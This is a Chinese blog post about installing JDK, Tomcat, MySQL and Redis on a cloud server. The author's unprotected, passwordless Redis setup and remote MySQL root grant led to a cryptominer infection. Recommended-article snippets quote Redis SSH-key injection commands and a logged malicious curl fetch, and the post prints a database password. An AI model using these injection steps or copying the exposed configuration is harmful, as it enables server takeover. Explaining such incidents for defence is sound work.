外网安装redis操作不规范导致服务器被挖矿,无奈之下重装

最新推荐文章于 2024-04-20 03:43:04 发布
最新推荐文章于 2024-04-20 03:43:04 发布
阅读量887 收藏 2
点赞数 1
分类专栏: 开发工具 文章标签: 服务器 redis java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Irons_one/article/details/122282804
版权

云服务器安装jdk,tomcat,mysql,redis

推荐使用一个工具:MobaXterm,一个上传文件和远程连接操作一体的软件

1. 安装JDK

用MobaXterm工具将jdk压缩包上传至服务器的一个文件夹中
请添加图片描述

解压

tar -xvf jdk-8u251-linux-x64.tar.gz -C /usr/java

请添加图片描述
配置环境变量:查看当前jdk路径
请添加图片描述

vi /etc/profile

请添加图片描述
配置完成保存退出
重新编译配置文件

source /etc/profile

请添加图片描述javac命令查看jdk环境是否配置成功

2、安装tomcat

上传文件
请添加图片描述
解压

tar -xvf apache-tomcat-9.0.41.tar.gz -C /usr/local

请添加图片描述
进入Tomcat的bin目录,并启动
请添加图片描述
启动命令

./startup.sh

启动成功
请添加图片描述

测试前先配置阿里云安全组,开放8080端口号请添加图片描述
测试
请添加图片描述
tomcat配置成功

3、安装数据库

上传文件
请添加图片描述
安装数据库之前,先卸载centos中自带的数据库,避免冲突

yum list installed | grep mariadb #检查是否有mariadb

请添加图片描述
卸载

yum -y remove mariadb-libs.x86_64

请添加图片描述
删除成功

解压mysql压缩包

tar -xvf mysql-5.7.18-linux-glibc2.5-x86_64.tar.gz -C /usr/local/mysql

文件名太长,改一下

mv mysql-5.7.18-linux-glibc2.5-x86_64 mysql-5.7.18

创建数据库文件夹data
请添加图片描述
创建用户

useradd mysql

yum install -y libaio

命令是一行命令,先在记事本打草稿
./mysqld --initialize --user=mysql --datadir=/usr/local/mysql/mysql-5.7.18/data --basedir=/usr/local/mysql/mysql-5.7.18

请添加图片描述

数据库初始密码先复制保存好,待会要改

 1my(JH3sBHVh

服务器与客户端来回传输的所有数据进行加密

./mysql_ssl_rsa_setup --datadir=/usr/local/mysql/mysql-5.7.18/data

请添加图片描述

修改mysql权限

chown -R mysql:mysql /usr/local/mysql/mysql-5.7.18/

启动mysql

./mysqld_safe &(其中&符号表示后台启动)

查看是否启动成功
请添加图片描述

ps -ef|grep mysql

进入mysql改密码

[root@iZuf6alkd6wkbcf5r3bystZ bin]# ./mysql -u root -p

用刚刚保存的密码
请添加图片描述

alter user 'root'@'localhost'identified by '新密码';

授权远程访问

grant all privileges on *.* to root@'%'identified by '新密码';

刷新权限

flush privileges;

同样在阿里云安全组开放3306端口号

本地连接测试
请添加图片描述
也可以配置一下环境变量,方便以后操作
请添加图片描述

4、安装redis

上传压缩包,解压缩,一样的操作
解压完后修改redis.conf文件
请添加图片描述

改三处
protected-mode no   #将yes改成no
#bind 127.0.0.1 -::1 #注释这一行
开放6379端口号

启动redis。。。

之前做完这些我就没管了,之后阿里云每天都发信息给我,说我的云服务器有恶意脚本

恶意代码做了什么?
1、拿到服务器root权限
2、替换一些命令,删除一些文件
3、扫描端口,干掉其他挖矿程序
4、下载恶意脚本执行
5、生成SSH文件,实现免密登录

上网了解了一下,挖矿的人真牛

利用redis实现攻击,怎么做?

1、webshell提权案例
2、定时任务shell反弹案例
3、SSH Key getshell案例

正确做法

限制访问IP
修改默认端口
密码访问
低权限运行redis
Irons_one
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
由于redis暴露外网未设置密码被挖矿问题处理
ZhengXinMing1998的博客
05-24 873
一、问题查找 接到腾讯云短信提醒,服务器可能被植入了挖矿程序。 1.于是top查看cpu占用,发现一个名为java8_8的程序会定时隔一段时间就占用系统特别高的cpu 2.检查系统中的定时任务 发现/etc/crontab文件中出现了可疑的定时任务,通过ip查找发现ip地址来自美国 3.检查系统启动项,发现启动项中确有java8_8-server,并且状态位enable的 二、问题处理 1.清除系统该进行的启动项:systemctl disable 服务名 2.查看进程的存储目录,rm -rf /
记一次redis遭受挖矿脚本攻击
weixin_39177464的博客
01-26 541
攻击前提:redis端口和密码均暴露 步骤: 1:生成一对公私钥,可本地命令行或使用工具生成,例如:ssh-keygen -t rsa 2:将公钥写入到文件里,例如:(echo-e"\n\n";cat id_rsa.pub;echo-e"\n\n")>foo.txt 3:cat命令读取公钥文件内容,并连接redis写入key test中,例如:cat /home/zqw/.ssh/foo.txt | ./redis-cli -h x.x.x.y -x set test 4:利用redis的配
新手使用Redis时,被挖矿组织偷袭
weixin_55166254的博客
10-20 542
本文大概分析了,当你打开Redis访问权限后,系统是如何被一步步入侵的过程,并记录了一下当被入侵后的一些措施,另外我的知识简单的处理,可能病毒仍未清除干净,需要找更专业的文章进行排查
卧槽~ 一文搞懂 Redis 挖矿原理及如何防范
最新发布
2401_84047990的博客
04-20 860
我还通过一些渠道整理了一些大厂真实面试主要有:蚂蚁金服、拼多多、阿里云、百度、唯品会、携程、丰巢科技、乐信、软通动力、OPPO、银盛支付、中国平安等初,中级,高级Java面试题集合,附带超详细答案,希望能帮助到大家。还有专门针对JVM、SPringBoot、SpringCloud、数据库、Linux、缓存、消息中间件、源码等相关面试题。《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!
redis未授权导致服务器挖矿分析(20220119)
fr1d4st的博客
01-27 2707
文章目录@[toc]0x00 背景0x01 现象0x02 临时处理0x03 溯源 0x00 背景 20220119收到阿里云报警短信 【阿里云】尊敬的******:云盾云安全中心检测到您的服务器:xx.xx.xx.xx(**)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1. 进行处理 。 登录阿里云控制台后发现有多条异常记录 恶意脚本代码执行(curl -s -L http://xx.xx.xx.xx/f220115rr/
redis后门导致挖矿minerd解决办法
weixin_34117522的博客
09-08 342
参考链接:http://www.cnblogs.com/zhouto/p/5680594.html本次产生挖矿minerd***的主要原因是由于redis的漏洞造成;redis安全:http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/在服务器中执行 top 查询,发现有miner...
redis外网安装
01-18
redis在无外网状态下的安装,里面包含安装教程与安装包。
linux服务器安装redis
01-09
linux服务器安装redis 1.连接上服务器,切换到root管理员下运行(便于后面修改配置) 2.利用xftp将redis-5.0.7上传的usr文件夹下的redis文件夹,一般没有可以用mkdir redis命令创建一个(也可以放在opt下,随意就...
Windows下安装Redis及使用Python操作Redis的方法
01-10
首先说一下在Windows下安装Redis安装包可以在https://github.com/MSOpenTech/redis/releases中找到,可以下载msi安装文件,也可以下载zip的压缩文件。 下载zip文件之后解压,解压后是这些文件: 里面这个Windows...
Linux服务器安装Redis教程
09-09
在本文中,我们将详细探讨如何在Linux服务器安装和配置Redis,这是一个流行的开源、高性能的键值存储系统,常用于数据库、缓存和消息中间件。Redis的高效性能使其成为提高服务器并发处理能力的理想选择。 首先,...
Windows操作系统下Redis服务安装图文教程
12-16
Redis下载地址:https://github.com/MSOpenTech/redis/releases ...7.等待安装,耗时不超过一分钟。 8.安装完成,单击Finsh按钮。 9.安装目录文件如下所示。 10.可以从服务中查看到redis服务已经正常运行。
redis不加密,导致服务器被黑,执行挖矿程序
Shine_mmm
04-13 527
做到以下这几点,可保证Redis安全 启动:不能以root用户来启动!!! 端口:避免用默认6379端口 地址:避免仅监听本地地址 密码:密码设置复杂一点 redis-cli登录时不要通过redis-cli -a YouPassword来登录,而是先登录后验证,redis-cli后,输入auth YouPassword的方式 限制Redis的文件目录访问权限 设置redis的主目录权限为700...
linux-centos安装redis(2)未配置redis密码,导致挖矿
Copy_ing的博客
08-21 239
承接上文 在设置完redis后,并未设置密码 并且将protected-mode 设置为no,后导致被入侵 我的占用内存的程序名为:phpupdate ps -ef |grep phpdate 看到进程号后,kill -9 PID,杀到进程后,此进程再没有启动,目前并不知道有没有被留下后门。 解决方式:https://blog.csdn.net/weixin_38023225/article/details/103723343?utm_medium=distribute.pc_relevant..
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1219
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
Redis未授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 811
Redis未授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
在docker中起redis
吴业亮的专栏
08-07 1019
作者:吴业亮 博客:http://blog.csdn.net/wylfengyujiancheng 在docker中起redis docker run -v /redis:/data -d -p 6666:6379 redis redis-server --appendonly yes --requirepass "Changeme_123"
服务器Redis实例中挖矿病毒排查及处理
wejack的专栏
01-20 700
文章系转载,方便整理和归纳,源文地址 https://z.itpub.net/article/detail/E0D0607EFA91E5FA88035F74D040DD26 巧不巧的我的服务器也被挖矿了,应该就是这个方法搞的 却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事.
CPU被挖矿Redis竟是内鬼
m0_67900727的博客
03-17 193
却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 图片 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事?Redis一脸懵。 这事还得要从一个月之前说起。 挖矿病毒 前情回顾:CPU深夜狂飙,一帮大佬都傻眼了··· 一个月前,突如其来的警报声打破了Linux帝国夜晚的宁静,CPU占用率突然飙升,却不知
linux的redis病毒pscan,Docker的redis容器导致挖矿病毒*kdevtmpfsi * 入侵, 干它
weixin_29218509的博客
05-14 543
以下内容全凭记忆。研发的一台docker创建了redis容器,直接设置无密访问导致被入侵。在母机上查询一下,其实第一个就可以了,第二个很多人搜索不到。[root@devtest tmp]# find / -name "*kdevtmpfsi*"/var/lib/docker/overlay2/0cf543cd0ddd70e9e68333057aefa1ca0c1864e5214630b4dd2f4...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Irons_one

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值